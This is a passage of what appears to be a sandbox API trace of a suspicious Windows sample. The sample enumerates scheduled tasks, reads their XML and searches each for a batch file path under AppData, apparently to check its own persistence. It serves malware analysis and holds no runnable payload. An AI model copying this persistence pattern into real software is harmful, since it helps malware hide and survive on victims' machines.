(This=0x929470) returned 0x0 [0162.446] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.447] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.447] IUnknown:Release (This=0x929470) returned 0x0 [0162.447] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.447] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x36, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.447] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.447] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=4) returned 0x0 [0162.447] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.447] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="CreateObjectTask") returned 0x0 [0162.447] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;SY)(A;;FRFX;;;IU)\r\n $(@%SystemRoot%\\system32\\shell32.dll,-14349)\r\n $(@%SystemRoot%\\system32\\shell32.dll,-14349)\r\n $(@%SystemRoot%\\system32\\shell32.dll,-14350)\r\n \\Microsoft\\Windows\\Shell\\CreateObjectTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n PT30S\r\n true\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {990A9F8F-301F-45F7-8D0E-68C5952DBA43}\r\n \r\n \r\n") returned 0x0 [0162.448] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;SY)(A;;FRFX;;;IU)\r\n $(@%SystemRoot%\\system32\\shell32.dll,-14349)\r\n $(@%SystemRoot%\\system32\\shell32.dll,-14349)\r\n $(@%SystemRoot%\\system32\\shell32.dll,-14350)\r\n \\Microsoft\\Windows\\Shell\\CreateObjectTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n PT30S\r\n true\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {990A9F8F-301F-45F7-8D0E-68C5952DBA43}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.448] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.448] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.448] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="FamilySafetyMonitor") returned 0x0 [0162.448] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;BU)\r\n $(@%SystemRoot%\\System32\\wpcmon.exe,-32013)\r\n $(@%SystemRoot%\\System32\\wpcmon.exe,-32014)\r\n $(@%SystemRoot%\\System32\\wpcmon.exe,-32015)\r\n \\Microsoft\\Windows\\Shell\\FamilySafetyMonitor\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n false\r\n PT10M\r\n Queue\r\n 1\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n %windir%\\System32\\wpcmon.exe\r\n \r\n \r\n") returned 0x0 [0162.449] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;BU)\r\n $(@%SystemRoot%\\System32\\wpcmon.exe,-32013)\r\n $(@%SystemRoot%\\System32\\wpcmon.exe,-32014)\r\n $(@%SystemRoot%\\System32\\wpcmon.exe,-32015)\r\n \\Microsoft\\Windows\\Shell\\FamilySafetyMonitor\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n false\r\n PT10M\r\n Queue\r\n 1\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n %windir%\\System32\\wpcmon.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.449] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.449] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.449] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="FamilySafetyRefresh") returned 0x0 [0162.449] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;LA)(A;OICI;FA;;;SY)(A;OICI;FRFX;;;AU)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\System32\\WpcWebSync.dll,-32010)\r\n $(@%SystemRoot%\\System32\\WpcWebSync.dll,-32011)\r\n $(@%SystemRoot%\\System32\\WpcWebSync.dll,-32012)\r\n \\Microsoft\\Windows\\Shell\\FamilySafetyRefresh\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n PT10M\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33A089541\r\n \r\n \r\n \r\n \r\n {EBF00FCB-0769-4B81-9BEC-6C05514111AA}\r\n \r\n \r\n \r\n") returned 0x0 [0162.450] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;LA)(A;OICI;FA;;;SY)(A;OICI;FRFX;;;AU)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\System32\\WpcWebSync.dll,-32010)\r\n $(@%SystemRoot%\\System32\\WpcWebSync.dll,-32011)\r\n $(@%SystemRoot%\\System32\\WpcWebSync.dll,-32012)\r\n \\Microsoft\\Windows\\Shell\\FamilySafetyRefresh\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n PT10M\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33A089541\r\n \r\n \r\n \r\n \r\n {EBF00FCB-0769-4B81-9BEC-6C05514111AA}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.450] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.450] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.450] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="IndexerAutomaticMaintenance") returned 0x0 [0162.450] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;SY)(A;;FA;;;LS)(A;;FR;;;BA)\r\n $(@%systemroot%\\system32\\srchadmin.dll,-1901)\r\n $(@%systemroot%\\system32\\srchadmin.dll,-1901)\r\n $(@%systemroot%\\system32\\srchadmin.dll,-1902)\r\n \\Microsoft\\Windows\\Shell\\IndexerAutomaticMaintenance\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n \r\n {3FBA60A6-7BF5-4868-A2CA-6623B3DFFEA6}\r\n \r\n \r\n") returned 0x0 [0162.450] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;SY)(A;;FA;;;LS)(A;;FR;;;BA)\r\n $(@%systemroot%\\system32\\srchadmin.dll,-1901)\r\n $(@%systemroot%\\system32\\srchadmin.dll,-1901)\r\n $(@%systemroot%\\system32\\srchadmin.dll,-1902)\r\n \\Microsoft\\Windows\\Shell\\IndexerAutomaticMaintenance\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n \r\n {3FBA60A6-7BF5-4868-A2CA-6623B3DFFEA6}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.451] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.451] IUnknown:Release (This=0x929460) returned 0x0 [0162.451] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.451] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.451] IUnknown:Release (This=0x929460) returned 0x0 [0162.451] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.451] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x37, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.451] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929490) returned 0x0 [0162.451] IRegisteredTaskCollection:get_Count (in: This=0x929490, pCount=0xce048 | out: pCount=0xce048*=3) returned 0x0 [0162.451] IRegisteredTaskCollection:get_Item (in: This=0x929490, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929630) returned 0x0 [0162.452] IRegisteredTask:get_Name (in: This=0x929630, pName=0xce058 | out: pName=0xce058*="SvcRestartTask") returned 0x0 [0162.452] IRegisteredTask:get_Xml (in: This=0x929630, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-201)\r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n \r\n 3\r\n PT1M\r\n \r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2121-09-03T20:02:58+02:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n {B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}\r\n \r\n \r\n \r\n") returned 0x0 [0162.452] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-201)\r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n \r\n 3\r\n PT1M\r\n \r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2121-09-03T20:02:58+02:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n {B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.452] IUnknown:Release (This=0x929630) returned 0x0 [0162.452] IRegisteredTaskCollection:get_Item (in: This=0x929490, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929630) returned 0x0 [0162.452] IRegisteredTask:get_Name (in: This=0x929630, pName=0xce058 | out: pName=0xce058*="SvcRestartTaskLogon") returned 0x0 [0162.452] IRegisteredTask:get_Xml (in: This=0x929630, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FRFW;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-4)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-202)\r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTaskLogon\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n \r\n 3\r\n PT1M\r\n \r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n {B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}\r\n \r\n \r\n \r\n") returned 0x0 [0162.453] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FRFW;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-4)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-202)\r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTaskLogon\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n \r\n 3\r\n PT1M\r\n \r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n {B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.453] IUnknown:Release (This=0x929630) returned 0x0 [0162.453] IRegisteredTaskCollection:get_Item (in: This=0x929490, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929630) returned 0x0 [0162.453] IRegisteredTask:get_Name (in: This=0x929630, pName=0xce058 | out: pName=0xce058*="SvcRestartTaskNetwork") returned 0x0 [0162.453] IRegisteredTask:get_Xml (in: This=0x929630, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FRFW;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-431836887-2321537645-4075769387-3393595759-2187231311)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-203)\r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTaskNetwork\r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n \r\n 3\r\n PT1M\r\n \r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"Microsoft-Windows-NetworkProfile/Operational\"><Select Path=\"Microsoft-Windows-NetworkProfile/Operational\">*[System[EventID=10000]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n {B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}\r\n \r\n \r\n \r\n") returned 0x0 [0162.454] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FRFW;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-431836887-2321537645-4075769387-3393595759-2187231311)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-203)\r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTaskNetwork\r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n \r\n 3\r\n PT1M\r\n \r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"Microsoft-Windows-NetworkProfile/Operational\"><Select Path=\"Microsoft-Windows-NetworkProfile/Operational\">*[System[EventID=10000]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n {B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.455] IUnknown:Release (This=0x929630) returned 0x0 [0162.455] IUnknown:Release (This=0x929490) returned 0x0 [0162.455] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929490) returned 0x0 [0162.455] ITaskFolderCollection:get_Count (in: This=0x929490, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.455] IUnknown:Release (This=0x929490) returned 0x0 [0162.455] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.455] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x38, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.455] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.456] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0162.456] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295f0) returned 0x0 [0162.456] IRegisteredTask:get_Name (in: This=0x9295f0, pName=0xce058 | out: pName=0xce058*="SpaceAgentTask") returned 0x0 [0162.456] IRegisteredTask:get_Xml (in: This=0x9295f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\SpaceAgent.exe,-1)\r\n $(@%SystemRoot%\\system32\\SpaceAgent.exe,-2)\r\n $(@%SystemRoot%\\system32\\SpaceAgent.exe,-3)\r\n \\Microsoft\\Windows\\SpacePort\\SpaceAgentTask\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n PT6H\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n false\r\n PT2M\r\n \r\n \r\n 7508BCA33E1E8702\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\SpaceAgent.exe\r\n \r\n \r\n") returned 0x0 [0162.457] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\SpaceAgent.exe,-1)\r\n $(@%SystemRoot%\\system32\\SpaceAgent.exe,-2)\r\n $(@%SystemRoot%\\system32\\SpaceAgent.exe,-3)\r\n \\Microsoft\\Windows\\SpacePort\\SpaceAgentTask\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n PT6H\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n false\r\n PT2M\r\n \r\n \r\n 7508BCA33E1E8702\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\SpaceAgent.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.457] IUnknown:Release (This=0x9295f0) returned 0x0 [0162.457] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295f0) returned 0x0 [0162.457] IRegisteredTask:get_Name (in: This=0x9295f0, pName=0xce058 | out: pName=0xce058*="SpaceManagerTask") returned 0x0 [0162.457] IRegisteredTask:get_Xml (in: This=0x9295f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\SpaceMan.exe,-1)\r\n $(@%SystemRoot%\\system32\\SpaceMan.exe,-2)\r\n $(@%SystemRoot%\\system32\\SpaceMan.exe,-3)\r\n \\Microsoft\\Windows\\SpacePort\\SpaceManagerTask\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n PT6H\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n false\r\n PT2M\r\n \r\n \r\n 7510BCA33E1E8702\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\SpaceMan.exe\r\n /Repair\r\n \r\n \r\n") returned 0x0 [0162.458] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\SpaceMan.exe,-1)\r\n $(@%SystemRoot%\\system32\\SpaceMan.exe,-2)\r\n $(@%SystemRoot%\\system32\\SpaceMan.exe,-3)\r\n \\Microsoft\\Windows\\SpacePort\\SpaceManagerTask\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n PT6H\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n false\r\n PT2M\r\n \r\n \r\n 7510BCA33E1E8702\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\SpaceMan.exe\r\n /Repair\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.458] IUnknown:Release (This=0x9295f0) returned 0x0 [0162.458] IUnknown:Release (This=0x929470) returned 0x0 [0162.458] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.459] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.459] IUnknown:Release (This=0x929470) returned 0x0 [0162.459] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.459] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x39, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.459] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929480) returned 0x0 [0162.459] IRegisteredTaskCollection:get_Count (in: This=0x929480, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0162.459] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929620) returned 0x0 [0162.459] IRegisteredTask:get_Name (in: This=0x929620, pName=0xce058 | out: pName=0xce058*="Storage Tiers Management Initialization") returned 0x0 [0162.459] IRegisteredTask:get_Xml (in: This=0x929620, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-601)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-600)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-602)\r\n \\Microsoft\\Windows\\Storage Tiers Management\\Storage Tiers Management Initialization\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n PT0S\r\n IgnoreNew\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA32B1D940D\r\n \r\n \r\n \r\n \r\n {5C9AB547-345D-4175-9AF6-65133463A100}\r\n \r\n \r\n") returned 0x0 [0162.460] StrStrIW (lpFirst="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-601)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-600)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-602)\r\n \\Microsoft\\Windows\\Storage Tiers Management\\Storage Tiers Management Initialization\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n PT0S\r\n IgnoreNew\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA32B1D940D\r\n \r\n \r\n \r\n \r\n {5C9AB547-345D-4175-9AF6-65133463A100}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.460] IUnknown:Release (This=0x929620) returned 0x0 [0162.460] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929620) returned 0x0 [0162.460] IRegisteredTask:get_Name (in: This=0x929620, pName=0xce058 | out: pName=0xce058*="Storage Tiers Optimization") returned 0x0 [0162.460] IRegisteredTask:get_Xml (in: This=0x929620, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-601)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-600)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-603)\r\n \\Microsoft\\Windows\\Storage Tiers Management\\Storage Tiers Optimization\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2013-01-01T01:00:00\r\n \r\n PT4H\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\defrag.exe\r\n -c -h -g -# -m 8 -i 13500\r\n \r\n \r\n") returned 0x0 [0162.461] StrStrIW (lpFirst="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-601)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-600)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-603)\r\n \\Microsoft\\Windows\\Storage Tiers Management\\Storage Tiers 